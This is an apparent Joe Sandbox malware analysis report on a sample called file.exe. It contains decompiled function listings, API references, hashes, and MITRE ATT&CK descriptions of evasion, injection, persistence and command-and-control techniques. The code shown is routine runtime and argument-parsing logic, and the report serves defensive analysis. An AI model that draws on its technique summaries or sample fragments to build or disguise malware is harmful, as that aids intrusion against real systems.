0x00000000
0x00408e37
0x00408e41
0x00408e71
0x00408e4f
0x00408e55
0x00408e59
0x00408e6b
0x00408e6e
0x00408e73
0x00408e7a
0x00408ee2
0x00408f12
0x00408ef0
0x00408ef6
0x00408efa
0x00408f0c
0x00408f0f
0x00408f18
0x00000000
0x00408f1a
0x00408f27
0x00408f31
0x00000000
0x00000000
0x00408f37
0x00408f3c
0x00408f72
0x00408f72
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f3e
0x00408f3e
0x00408f3e
0x00408f3e
0x00408f41
0x00408f5c
0x00408f43
0x00408f49
0x00408f4b
0x00408f4d
0x00408f51
0x00408f51
0x00408f66
0x00000000
0x00000000
0x00408f6c
0x00408f70
0x00000000
0x00000000
0x00000000
0x00408f70
0x00000000
0x00408f3e
0x00408e7c
0x00408e7c
0x00408e7c
0x00408e7f
0x00408e82
0x00408e97
0x00408e84
0x00408e86
0x00408e88
0x00408e8a
0x00408e8e
0x00408e8e
0x00408ea1
0x00408eac
0x00408eac
0x00408eaf
0x00408ec4
0x00408eb1
0x00408eb3
0x00408eb5
0x00408eb7
0x00408ebb
0x00408ebb
0x00408ece
0x00000000
0x00408ed0
0x00408ed0
0x00000000
0x00408ed0
0x00408ea3
0x00408ea3
0x00408ea3
0x00000000
0x00408ea3
0x00408ea1
0x00408e7a

APIs

__flsbuf.LIBCMT ref: 00408E97
__flsbuf.LIBCMT ref: 00408EC4
_wctomb_s.LIBCMT ref: 00408F27
__flsbuf.LIBCMT ref: 00408F5C
__flswbuf.LIBCMT ref: 00408F91

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: __flsbuf$__flswbuf_wctomb_s
String ID:
API String ID: 3257920507-0
Opcode ID: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
Instruction ID: e3320308620aae82afad94c34382f6534f6cf98c8d3c2b43a25689cd414ae7a4
Opcode Fuzzy Hash: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
Instruction Fuzzy Hash: 9B5127721196119ECB249B38DA818AB37A8DF16335330073FF5E1EB2D1DE3C9502869D

Uniqueness

Uniqueness Score: -1.00%

Function 00401800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401800(void* __ebx, intOrPtr* __edi, void* __esi) {
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr* _t25;
				signed int _t27;
				char _t29;
				void* _t30;

				_t25 = __edi;
				_t19 = __ebx;
				_t29 = 0;
				if(__edi != 0) {
					_t27 = 0;
					if( *__edi > 0) {
						while(1) {
							_t16 = E0040346A(_t19, _t29,  *((intOrPtr*)(_t19 + _t27 * 4)), L"/accepteula");
							_t30 = _t30 + 8;
							if(_t16 == 0) {
								break;
							}
							_t18 = E0040346A(_t19, _t29,  *((intOrPtr*)(_t19 + _t27 * 4)), L"-accepteula");
							_t30 = _t30 + 8;
							if(_t18 == 0) {
								break;
							} else {
								_t27 = _t27 + 1;
								if(_t27 <  *_t25) {
									continue;
								} else {
								}
							}
							goto L10;
						}
						_t29 = 1;
						while(_t27 <  *_t25 - 1) {
							 *((intOrPtr*)(_t19 + _t27 * 4)) =  *((intOrPtr*)(_t19 + 4 + _t27 * 4));
							_t27 = _t27 + 1;
						}
						 *_t25 =  *_t25 + 0xffffffff;
					}
					L10:
				}
				if(E00401470(_t29) != 0) {
					_t29 = 1;
				}
				return 0 | _t29 != 0x00000000;
			}

0x00401800
0x00401800
0x00401801
0x00401805
0x00401808
0x0040180c
0x00401810
0x00401819
0x0040181e
0x00401823
0x00000000
0x00000000
0x0040182e
0x00401833
0x00401838
0x00000000
0x0040183a
0x0040183a
0x0040183f
0x00000000
0x00000000
0x00401841
0x0040183f
0x00000000
0x00401838
0x00401845
0x0040184e
0x00401854
0x00401859
0x0040185d
0x00401861
0x00401861
0x00401864
0x00401864
0x00401870
0x00401872
0x00401872
0x0040187f

APIs

__wcsicmp.LIBCMT ref: 00401819
__wcsicmp.LIBCMT ref: 0040182E

Strings

-accepteula, xrefs: 00401828
/accepteula, xrefs: 00401813

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: __wcsicmp
String ID: -accepteula$/accepteula
API String ID: 1389419275-3604086781
Opcode ID: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
Instruction ID: ae80dfe79650e11862fde2afe1a2a16d5d6f03895628a9dbedd2dac65a09cae5
Opcode Fuzzy Hash: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
Instruction Fuzzy Hash: F1012473D0022A87CB307EBA9C41B6B77486B50348F11863AAC59B73D2EA79DE50C695

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8 Relevance: 6.0, APIs: 4, Instructions: 45
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 55%

			E004065E8(void* __ebx, void* __edx, void* __fp0) {
				void* __edi;
				void* __esi;
				long _t3;
				intOrPtr* _t8;
				void* _t9;
				long _t12;
				void* _t16;
				void* _t20;
				long _t21;
				long* _t22;

				_t20 = __edx;
				_t3 = GetLastError();
				_push( *0x4138c0);
				_t21 = _t3;
				_t22 =  *((intOrPtr*)(E004064BA()))();
				if(_t22 == 0) {
					_t22 = E00407C87(1, 0x214);
					if(_t22 != 0) {
						_push(_t22);
						_push( *0x4138c0);
						_t8 = E00406443( *0x4144f8);
						_pop(_t16);
						_t9 =  *_t8();
						_t25 = _t9;
						if(_t9 == 0) {
							_push(_t22);
							E00403199(__ebx, _t16, _t20, _t21, _t22, __eflags);
							_t22 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t22);
							E00406529(__ebx, _t16, _t20, _t21, _t22, _t25, __fp0);
							_t12 = GetCurrentThreadId();
							_t22[1] = _t22[1] | 0xffffffff;
							 *_t22 = _t12;
						}
					}
				}
				SetLastError(_t21);
				return _t22;
			}

0x004065e8
0x004065ea
0x004065f0
0x004065f6
0x004065ff
0x00406603
0x00406611
0x00406617
0x00406619
0x0040661a
0x00406626
0x0040662b
0x0040662c
0x0040662e
0x00406630
0x0040664a
0x0040664b
0x00406651
0x00406651
0x00406632
0x00406632
0x00406634
0x00406635
0x0040663c
0x00406642
0x00406646
0x00406646
0x00406630
0x00406617
0x00406654
0x0040665e

APIs

GetLastError.KERNEL32(00000000,?,00406665,?,004085BE,00000000,00000000,00000000), ref: 004065EA

Part of subcall function 004064BA: TlsGetValue.KERNEL32(?,004065FD), ref: 004064C1
Part of subcall function 004064BA: TlsSetValue.KERNEL32(00000000), ref: 004064E2

__calloc_crt.LIBCMT ref: 0040660C

Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC

Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467

Part of subcall function 00406529: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
Part of subcall function 00406529: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
Part of subcall function 00406529: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
Part of subcall function 00406529: InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
Part of subcall function 00406529: ___addlocaleref.LIBCMT ref: 004065C7

GetCurrentThreadId.KERNEL32 ref: 0040663C
SetLastError.KERNEL32(00000000), ref: 00406654

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl
String ID:
API String ID: 4195734883-0
Opcode ID: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
Instruction ID: 6acc180e9db3e0c08f8946cbde5c9b75496807f8aa197502050a49a5b2d53bc3
Opcode Fuzzy Hash: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
Instruction Fuzzy Hash: 13F04C324002226BD2313BB5BC0668A3B95DF01BB9B12453FF542BA2D0DF3DC91182DD

Uniqueness

Uniqueness Score: -1.00%

Function 00401C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00401C30(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				short _t21;
				void* _t33;
				void* _t46;
				void* _t49;
				short* _t50;
				void* _t52;

				_t50 = _t52 - 0x204;
				_push(0xfffffffe);
				_push(0x411d48);
				_push(E00404AF0);
				_push( *[fs:0x0]);
				_t20 =  *0x413004; // 0xf284055d
				 *(_t50 - 8) =  *(_t50 - 8) ^ _t20;
				_t21 = _t20 ^ _t50;
				_t50[0x100] = _t21;
				 *[fs:0x0] = _t50 - 0x10;
				 *((intOrPtr*)(_t50 - 0x18)) = _t52 - 0x1f0;
				 *(_t50 - 0x1c) = 0;
				_push(_t50[0x108]);
				_push(_t50[0x106] & 0x0000ffff);
				E004032BD(_t50, 0x100, L"\\StringFileInfo\\%04X%04X\\%s", __ecx & 0x0000ffff);
				 *((intOrPtr*)(_t50 - 4)) = 0;
				_t43 = _t50;
				 *(_t50 - 0x1c) = VerQueryValueW(__edx, _t50, _t50 - 0x20, _t50 - 0x24);
				 *((intOrPtr*)(_t50 - 4)) = 0xfffffffe;
				asm("sbb eax, eax");
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0x10));
				_pop(_t46);
				_pop(_t49);
				_t33 = _t21;
				return E0040318A( ~( *(_t50 - 0x1c)) &  *(_t50 - 0x20), _t33, _t50[0x100] ^ _t50, _t43, _t46, _t49);
			}

0x00401c31
0x00401c3e
0x00401c40
0x00401c45
0x00401c50
0x00401c54
0x00401c59
0x00401c5c
0x00401c5e
0x00401c6b
0x00401c71
0x00401c7e
0x00401c81
0x00401c89
0x00401c9c
0x00401ca4
0x00401caf
0x00401cb9
0x00401cc7
0x00401cd3
0x00401cdb
0x00401ce3
0x00401ce4
0x00401ce5
0x00401cfc

APIs

_swprintf.LIBCMT ref: 00401C9C

Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0

VerQueryValueW.VERSION(00000000,?,?,?,?,?,F284055D,?,00000000,00000000,?,?,00404AF0,00411D48,000000FE), ref: 00401CB4

Strings

\StringFileInfo\%04X%04X\%s, xrefs: 00401C8E

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: QueryValue__vswprintf_s_l_swprintf
String ID: \StringFileInfo\%04X%04X\%s
API String ID: 4007372565-3176804452
Opcode ID: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
Instruction ID: 16fea18b266e5000ac73c5f0c1a7a8be829457a3a8ce474c65f6ca9c4e30ee4f
Opcode Fuzzy Hash: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
Instruction Fuzzy Hash: 242169B2940248ABDB20DF95DC45FEE77F8FB48710F10465EF515A7181D6785604CB64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Temp\?????.sys

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
file.exe

Function 00007FFC9CFA58C4 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Function 00007FFC9CFA5870 Relevance: 1.6, APIs: 1, Instructions: 102
nativeCOMMON

Function 00007FFC9CF9187E Relevance: 1.7, APIs: 1, Instructions: 204
libraryCOMMON

Function 00007FFC9CF99770 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Function 00007FFC9CFA5890 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Function 00007FFC9CF9287C Relevance: 1.6, APIs: 1, Instructions: 119
memoryCOMMON

Function 00007FFC9CF99D44 Relevance: 1.6, APIs: 1, Instructions: 114
libraryCOMMON

Function 00007FFC9CFA58D4 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Function 00403CFC Relevance: 36.2, APIs: 1, Strings: 23, Instructions: 217
memoryCOMMONLIBRARYCODE

Function 00403DE2 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 47
memoryCOMMON

Function 00402050 Relevance: 109.1, APIs: 43, Strings: 19, Instructions: 573
windowprocesssleepCOMMON

Function 00402CB0 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 195
libraryloaderCOMMON

Function 004029C0 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 251
COMMON

Function 00407219 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00401D50 Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 213
windowCOMMON

Function 00401930 Relevance: 47.3, APIs: 13, Strings: 14, Instructions: 48
registrywindowCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre